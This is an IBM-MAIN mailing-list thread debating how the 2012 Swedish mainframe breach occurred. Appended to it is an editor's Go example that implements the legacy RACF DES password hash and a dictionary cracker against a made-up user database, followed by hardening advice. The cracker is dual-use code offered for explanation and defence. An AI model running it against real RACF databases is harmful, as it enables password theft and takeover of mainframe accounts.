> And yes, it was a z/OS vulnerability. Are you saying that Bob Bridges was wrong when he wrote "The stolen ID also had read access to the RACF database.."? It's not a vulnerability of the lock when you leave your key on the porch for anyone to use.
--
Shmuel (Seymour J.) Metz
http://mason.gmu.edu/~smetz3

________________________________________
From: IBM Mainframe Discussion List <IBM-MAIN@LISTSERV.UA.EDU> on behalf of Charles Mills <charl...@mcn.org>
Sent: Thursday, May 9, 2019 2:20 PM
To: IBM-MAIN@LISTSERV.UA.EDU
Subject: Re: Can backup mechanisms be used to steal RACF database? was Re: mainframe hacking "success stories"?

I have read the entire, very thorough police report, as has Chad R. Phil Young has done considerable research on this.

There were two parts to it. Svartholm somehow got the MPAA lawyer's user login for the Infotorg legal database, hosted on USS. (The "somehow" may be known but I do not know or recall it.) That userid was insignificant to the overall integrity of the Z box. He was able to harass the lawyer by changing her password, etc., etc., but that was all. No real threat to system integrity. It would be like if I had the userid and password for one of your vanilla CICS users. Not good, but not the end of the world.

He leveraged that, via the HTTP vulnerability, into pwning the whole box: multiple RACF SPECIAL IDs, etc., etc. That was the huge, huge, huge problem for the service bureau. So the z/OS vulnerability was the key here, not one random userid.

And yes, it was a z/OS vulnerability. It was a zero-day defect in system software running as a service of z/OS. If that's not a z/OS vulnerability I don't know what is.

Charles

-----Original Message-----
From: IBM Mainframe Discussion List [mailto:IBM-MAIN@LISTSERV.UA.EDU] On Behalf Of Bob Bridges
Sent: Thursday, May 9, 2019 10:28 AM
To: IBM-MAIN@LISTSERV.UA.EDU
Subject: Re: Can backup mechanisms be used to steal RACF database? was Re: mainframe hacking "success stories"?

I believe Peter's right. The hackers got a stolen ID with some RACF power, by means not positively identified but social engineering is as likely as any other hypothesis.
(I read ~speculation~ about an HTTP vulnerability, but the forensic investigators never established how the initial break-in occurred.) Once they were in, they fooled around in OMVS and were able to get more power. The stolen ID also had read access to the RACF database.

"There are also solid indications that they downloaded the RACF database (about 28MB).... Once they'd downloaded the RACF database, they subjected it to a password-cracking tool.... On Feb 28, about the same time the RACF database was downloaded, some questions appeared on the mailing list PaulDotCom about hashing methods for RACF; by March 3rd, apparently in response, John the Ripper had been enhanced to include the capability of working on RACF passwords, in collaboration with another tool called CRACF.... By way of testing, investigators attempted to use these tools themselves to crack RACF passwords. They found that a great many passwords could be extracted, that they were easy to discover by dictionary attack, that they were not very complex and in many cases that they'd been unchanged from the default when the ID was created. Using a standalone PC they cracked about 30 000 passwords (out of 120 000 on Applicat's database) in 'a couple of days'."

So yeah, the investigators did it too, but just to establish how effective might be the new version of John the Ripper.

---
Bob Bridges, robhbrid...@gmail.com, cell 336 382-7313

/* Be careful of your thoughts; they may become words at any moment. -Ira Gassen */

-----Original Message-----
From: IBM Mainframe Discussion List [mailto:IBM-MAIN@LISTSERV.UA.EDU] On Behalf Of Charles Mills
Sent: Thursday, May 9, 2019 11:39

No. Read the original thread here. It was a vulnerability in a Web server. Hacking the RACF database was done well after the fact, by investigators.
-----Original Message-----
From: IBM Mainframe Discussion List [mailto:IBM-MAIN@LISTSERV.UA.EDU] On Behalf Of Peter Vander Woude
Sent: Thursday, May 9, 2019 6:56 AM

That's what happened in the Swedish bank hack, back in 2012. In that, once they got the database copy on their PC, they used hacker tools that are out there, to crack all the passwords.

----------------------------------------------------------------------
For IBM-MAIN subscribe / signoff / archive access instructions,
send email to lists...@listserv.ua.edu with the message: INFO IBM-MAIN
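Editor's added example, not part of the thread or of the police report Bob Bridges quotes: a worked version of the password cracking the report describes, i.e. what John the Ripper's racf mode and CRACF do with an unloaded RACF database. The page never spells out the hashing method, so the algorithm implemented here is the legacy (pre-KDFAES) RACF DES scheme as the editor understands it from the public cracker implementations: the password is folded to upper case, converted to EBCDIC, padded with blanks to 8 bytes, each byte XORed with 0x55 and shifted left one bit, and the result is used as a single-DES key to encrypt the user ID (also EBCDIC, blank-padded) as the one block; the 8-byte ciphertext is the stored hash. Check that description against the John the Ripper racf format source before relying on it. The user IDs, passwords, word list and the four-user "database" are constructed for the demo; the hashes are computed by the code itself and come from no real system.

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// racfChars are the characters a legacy RACF password or user ID may contain;
// ebcdicCodes[i] is the CP037 EBCDIC code point of racfChars[i].
const racfChars = " #@$ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

var ebcdicCodes = []byte{
	0x40, 0x7B, 0x7C, 0x5B, 0xC1, 0xC2, 0xC3, 0xC4, 0xC5, 0xC6, 0xC7, 0xC8, 0xC9,
	0xD1, 0xD2, 0xD3, 0xD4, 0xD5, 0xD6, 0xD7, 0xD8, 0xD9,
	0xE2, 0xE3, 0xE4, 0xE5, 0xE6, 0xE7, 0xE8, 0xE9,
	0xF0, 0xF1, 0xF2, 0xF3, 0xF4, 0xF5, 0xF6, 0xF7, 0xF8, 0xF9,
}

// toField upper-cases s (legacy RACF passwords are not case sensitive),
// converts it to EBCDIC and pads with EBCDIC blanks to RACF's 8-byte field.
func toField(s string) ([8]byte, error) {
	field := [8]byte{0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40}
	s = strings.ToUpper(s)
	if len(s) == 0 || len(s) > 8 {
		return field, fmt.Errorf("%q: RACF fields are 1 to 8 characters", s)
	}
	for i := 0; i < len(s); i++ {
		idx := strings.IndexByte(racfChars, s[i])
		if idx < 0 {
			return field, fmt.Errorf("%q: %q is not valid in a legacy RACF field", s, s[i])
		}
		field[i] = ebcdicCodes[idx]
	}
	return field, nil
}

// RacfDESHash is the legacy RACF DES scheme as the lead-in describes it (editor's
// description): transformed EBCDIC password as DES key, EBCDIC user ID as the block.
func RacfDESHash(userid, password string) ([]byte, error) {
	pw, err := toField(password)
	if err != nil {
		return nil, err
	}
	uid, err := toField(userid)
	if err != nil {
		return nil, err
	}
	var key [8]byte
	for i, b := range pw {
		key[i] = (b ^ 0x55) << 1 // low bit lands in DES's ignored parity position
	}
	block, _ := des.NewCipher(key[:]) // cannot fail: key is always 8 bytes
	hash := make([]byte, des.BlockSize)
	block.Encrypt(hash, uid[:]) // user ID is the plaintext, so it is the only "salt"
	return hash, nil
}

// CrackDictionary takes the unloaded database as user ID -> hex hash, re-hashes
// every word under each user ID and compares; returns recovered passwords by ID.
func CrackDictionary(db map[string]string, words []string) map[string]string {
	found := make(map[string]string)
	for id, hash := range db {
		for _, w := range words {
			h, err := RacfDESHash(id, w) // err != nil: w is not a legal legacy password
			if err == nil && strings.EqualFold(hex.EncodeToString(h), hash) {
				found[id] = strings.ToUpper(w)
				break
			}
		}
	}
	return found
}

// SampleDatabase is a constructed four-user database (from no real system).
func SampleDatabase() map[string]string {
	users := [][2]string{
		{"IBMUSER", "SYS1"},    // default never changed
		{"SMITHJ", "password"}, // dictionary word; case is irrelevant
		{"APPL01", "APPL01"},   // password equals the user ID
		{"SECADM", "Q7#V2M$K"}, // not in the word list, stays uncracked
	}
	db := make(map[string]string)
	for _, u := range users {
		h, _ := RacfDESHash(u[0], u[1]) // inputs above are known-valid fields
		db[u[0]] = strings.ToUpper(hex.EncodeToString(h))
	}
	return db
}

// SampleWordlist is a constructed stand-in for the cracker's dictionary.
var SampleWordlist = []string{"sys1", "password", "secret", "ibmuser", "appl01", "welcome1"}

func main() {
	for id, pw := range CrackDictionary(SampleDatabase(), SampleWordlist) {
		fmt.Printf("cracked %s: %s\n", id, pw)
	}
}
```

Why 30 000 of 120 000 fell in a couple of days on one PC follows directly from the construction: one DES operation per guess, an 8-character upper-case-only alphabet of 39 symbols, no iteration, and a "salt" (the user ID) that is public, so a list of vendor defaults, user IDs and dictionary words covers a large share of any population that never changed its initial password. The checks a practitioner wants from this: on a current z/OS, confirm with SETROPTS LIST that the active password algorithm is KDFAES rather than the legacy DES scheme, and treat every copy of the RACF primary and backup data sets (dumps, backups, offloaded copies) as password-hash material whose read access must be as restricted as the live database, since read access is all the report says the stolen ID needed.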